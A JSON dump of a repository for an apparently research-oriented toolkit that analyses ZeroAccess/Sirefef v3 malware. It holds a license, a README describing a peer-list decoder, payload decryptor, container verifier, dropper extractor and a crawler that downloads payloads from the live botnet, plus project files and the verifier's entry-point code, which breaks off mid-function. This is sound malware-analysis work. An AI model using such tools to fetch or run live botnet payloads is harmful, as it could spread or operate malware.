[
  {
    "path": "LICENSE.md",
    "content": "Copyright (c) 2016 - 2017 ZeroAccess Project\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n  list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n  this list of conditions and the following disclaimer in the documentation\n  and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n"
  },
  {
    "path": "README.md",
    "content": "\n# ZeroAccess\n## Toolkit for ZeroAccess/Sirefef v3\n\nZeroAccess is an advanced malware family (probably most advanced from all of available), whose first appearance was in the middle of 2009. Initially Win32 kernel mode rootkit, transformed then into user mode toolkit. Uses self made p2p engine for communication (main purpose - download files). Based on modular structure. Survived multiple takedown attempts (they were mostly serving marketing purposes of various so-called security companies/corporations). Has multiple generations of various toolkit modules. This project provide you insights into ZeroAccess v3 code and several instruments to work with ZeroAccess v3 files. Mostly for education purposes.\n\n# Project Contents\n\n**Umikaze - peer list (@ file) decoder**\n\nProcesses input file as ZeroAccess peer file, type required for correct port assignation. \nResult is output file with Time and IP+Port pairs as text. \n\n> **Usage:** zadecode peerlist_filename [type 32 or 64, default 32], for example: zadecode s32 32\n\n**Shigure - payload decryptor**\n\nProcesses input as ZeroAccess payload container, attempting to decode it using RC4 and extract Microsoft Cabinet afterthat.\n\n> **Usage:** zadecrypt inputfile [outputfile], for example: zadecrypt 80000000.@ out.bin\n\n**Harusame - payload container verificator**\n\nVerifies if given file is valid container for ZeroAccess. Requires EA to be set at input file. More information about verification algorithm can be found in source.\n\n> **Usage:** zacheck inputfile [mode 32 or 64, default 32], for example: zacheck 80000000.@ 32\n\n**Yuudachi - ZeroAccess p2p network crawler**\n\nGUI application that monitors given p2p botnet network and downloads payload from it. Downloaded files contain  all required information for further verification by zacheck tool. Dumps collected peers in ZeroAccess format so they can be used as bootstrap next. Use x86-32 version for win32 botnet and x64 for win64. 
To work, it requires a proper bootstrap list and read/write access to the current directory.\n\n**Murasame - dropper extractor**\n\nExtracts the actual bot installation dropper from the encrypted resource of the high level dropper.\n\n> **Usage:** zaextract inputfile [outputfile] hexkey, for example: zaextract highlvlbot.bin lowlvlbot.bin 0x12345678\n\n# System Requirements\n\nDoes not require administrative privileges. Some tools may require read/write access to their directories. A modern compatible NT version is required; Windows XP is not supported. For best results, allow zamon32/zamon64 through the firewall.\n\n# Build \n\nThe project comes with full source code written in C. \nTo build from source you need Microsoft Visual Studio 2015 U1 or later.\n \n# Authors\n\n(c) 2016 ZeroAccess Project\n"
  },
  {
    "path": "Source/Harusame/Harusame.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>Harusame</RootNamespace>\n    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" 
Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" 
Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>zacheck32</TargetName>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>zacheck64</TargetName>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      
<AdditionalDependencies>cryptdll.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      <AdditionalDependencies>cryptdll.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <AdditionalDependencies>cryptdll.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    
<ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <AdditionalDependencies>cryptdll.lib;%(AdditionalDependencies)</AdditionalDependencies>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"..\\minirtl\\cmdline.c\" />\n    <ClCompile Include=\"..\\minirtl\\hextou64.c\" />\n    <ClCompile Include=\"..\\minirtl\\hextoul.c\" />\n    <ClCompile Include=\"..\\minirtl\\i64tostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\itostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoi.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoi64.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtou64.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoul.c\" />\n    <ClCompile Include=\"..\\minirtl\\u64tohex.c\" />\n    <ClCompile Include=\"..\\minirtl\\u64tostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\ultohex.c\" />\n    <ClCompile Include=\"..\\minirtl\\ultostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\_filename.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcat.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcmp.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcmpi.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcpy.c\" />\n    <ClCompile 
Include=\"..\\minirtl\\_strend.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strlen.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncmp.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncmpi.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncpy.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strstr.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strstri.c\" />\n    <ClCompile Include=\"..\\shared\\cui.c\" />\n    <ClCompile Include=\"..\\shared\\ea.c\" />\n    <ClCompile Include=\"..\\shared\\ldr.c\" />\n    <ClCompile Include=\"..\\shared\\md5.c\" />\n    <ClCompile Include=\"..\\shared\\util.c\" />\n    <ClCompile Include=\"..\\shared\\za_crypto.c\" />\n    <ClCompile Include=\"main.c\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\minirtl\\cmdline.h\" />\n    <ClInclude Include=\"..\\minirtl\\minirtl.h\" />\n    <ClInclude Include=\"..\\minirtl\\rtltypes.h\" />\n    <ClInclude Include=\"..\\minirtl\\_filename.h\" />\n    <ClInclude Include=\"..\\shared\\cui.h\" />\n    <ClInclude Include=\"..\\shared\\ea.h\" />\n    <ClInclude Include=\"..\\shared\\global.h\" />\n    <ClInclude Include=\"..\\shared\\ldr.h\" />\n    <ClInclude Include=\"..\\shared\\md5.h\" />\n    <ClInclude Include=\"..\\shared\\ntos.h\" />\n    <ClInclude Include=\"..\\shared\\util.h\" />\n    <ClInclude Include=\"..\\shared\\za.h\" />\n    <ClInclude Include=\"..\\shared\\za_crypto.h\" />\n    <ClInclude Include=\"..\\shared\\za_rkey.h\" />\n    <ClInclude Include=\"resource.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"resource.rc\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Source/Harusame/Harusame.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n    <Filter Include=\"minirtl\">\n      <UniqueIdentifier>{ee77c473-79e0-4e59-9cc2-8a1c0f3caaa6}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"shared\">\n      <UniqueIdentifier>{9ddd8dd9-4aea-4a5a-8649-efbcc9649130}</UniqueIdentifier>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"main.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcat.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strend.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strlen.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncmpi.c\">\n      
<Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strstr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strstri.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\cmdline.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\hextou64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\hextoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\i64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\itostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoi64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtou64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\u64tohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\u64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\ultohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\ultostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\cui.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\md5.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\util.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile 
Include=\"..\\shared\\za_crypto.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\ldr.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\ea.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_filename.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\minirtl\\cmdline.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\minirtl.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\rtltypes.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\cui.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\global.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\md5.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\ntos.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\util.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\za.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\za_rkey.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"resource.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\za_crypto.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\ldr.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\ea.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\_filename.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"resource.rc\">\n      <Filter>Resource 
Files</Filter>\n    </ResourceCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Source/Harusame/Harusame.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n</Project>"
  },
  {
    "path": "Source/Harusame/main.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n*  TITLE:       MAIN.C\n*\n*  VERSION:     1.02\n*\n*  DATE:        01 Dec 2017\n*\n*  Harusame program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"..\\shared\\global.h\"\n#include \"..\\shared\\cui.h\"\n#include \"..\\shared\\za_rkey.h\"\n\nHANDLE g_ConOut = NULL;\nWCHAR g_BE = 0xFEFF;\nBOOL g_ConsoleOutput = FALSE;\n\n#define T_SFCHECKTTITLE  L\"Sirefef/ZeroAccess 3 file checker v1.0 (14/01/16)\"\n#define T_SFCHECKUSAGE   L\"Usage: zacheck inputfile [mode 32 or 64, default 32]\\n\\r\\te.g. zacheck in.dll 32\\r\\n\"\n#define T_SFCHECKMODE    L\"Wrong mode, possible values 32 or 64\\r\\n\"\n#define T_SFCHECKED      L\"File verification SUCCESSFUL \"\n#define T_SFCHECKFAIL    L\"File verification FAILED \"\n#define T_SFEAFAILURE    L\"File extended attributes missing or incorrect, cannot verify file\"\n#define T_SFPRESSANYKEY  L\"\\r\\nPress Enter to exit\"\n\n/*\n* SfProcessCmdLine\n*\n* Purpose:\n*\n* Parse command line and do the job.\n*\n*/\nUINT SfProcessCmdLine(\n    LPWSTR lpCommandLine\n)\n{\n    ULONG        rlen, uMode = 32;\n    WCHAR        szInputFile[MAX_PATH + 1];\n    WCHAR        szMode[MAX_PATH + 1];\n    NTSTATUS     status;\n    PBYTE        pKey;\n    ULONG        KeySize;\n\n    //path\n    rlen = 0;\n    RtlSecureZeroMemory(szInputFile, sizeof(szInputFile));\n    GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &rlen);\n    if (rlen == 0) {\n        SfcuiPrintText(g_ConOut,\n            T_SFCHECKUSAGE,\n            g_ConsoleOutput, FALSE);\n        return (UINT)-1;\n    }\n\n    
//type\n    rlen = 0;\n    RtlSecureZeroMemory(&szMode, sizeof(szMode));\n    GetCommandLineParam(lpCommandLine, 2, (LPWSTR)&szMode, MAX_PATH, &rlen);\n    if (rlen == 0) {\n        uMode = 32;\n    }\n    else {\n        uMode = strtoul(szMode);\n        if (uMode != 32 && uMode != 64) {\n\n            SfcuiPrintText(g_ConOut,\n                T_SFCHECKMODE,\n                g_ConsoleOutput, FALSE);\n\n            return (UINT)-2;\n        }\n    }\n\n    pKey = (PBYTE)&ZA_key32;\n    KeySize = sizeof(ZA_key32);\n\n    if (uMode == 64) {\n        pKey = (PBYTE)&ZA_key64;\n        KeySize = sizeof(ZA_key64);\n    }\n\n    status = SfcIsFileLegit(szInputFile, pKey, KeySize);\n\n    //print result\n    SfcuiPrintText(g_ConOut,\n        szInputFile,\n        g_ConsoleOutput, TRUE);\n\n    _strcpy(szMode, TEXT(\"Verification mode: \"));\n    ultostr(uMode, _strend(szMode));\n    _strcat(szMode, TEXT(\"\\r\\n\"));\n    SfcuiPrintText(g_ConOut,\n        szMode,\n        g_ConsoleOutput, TRUE);\n\n    switch (status) {\n\n    case STATUS_EA_LIST_INCONSISTENT:\n        SfcuiPrintText(g_ConOut,\n            T_SFEAFAILURE,\n            g_ConsoleOutput, TRUE);\n        break;\n\n    case STATUS_SUCCESS:\n        SfcuiPrintText(g_ConOut,\n            T_SFCHECKED,\n            g_ConsoleOutput, TRUE);\n        break;\n\n    default:\n        SfcuiPrintText(g_ConOut,\n            T_SFCHECKFAIL,\n            g_ConsoleOutput, TRUE);\n        break;\n    }\n\n    return (NT_SUCCESS(status));\n}\n\n/*\n* SfMain\n*\n* Purpose:\n*\n* Harusame main.\n*\n*/\nvoid SfMain(\n    VOID\n)\n{\n    BOOL         cond = FALSE;\n    UINT         uResult = 0;\n    DWORD        dwTemp;\n    HANDLE       StdIn;\n    INPUT_RECORD inp1;\n\n    __security_init_cookie();\n\n    do {\n\n        if (!SfInitMD5()) {\n            uResult = (UINT)-1;\n            break;\n        }\n\n        g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);\n        if (g_ConOut == INVALID_HANDLE_VALUE) {\n            uResult = 
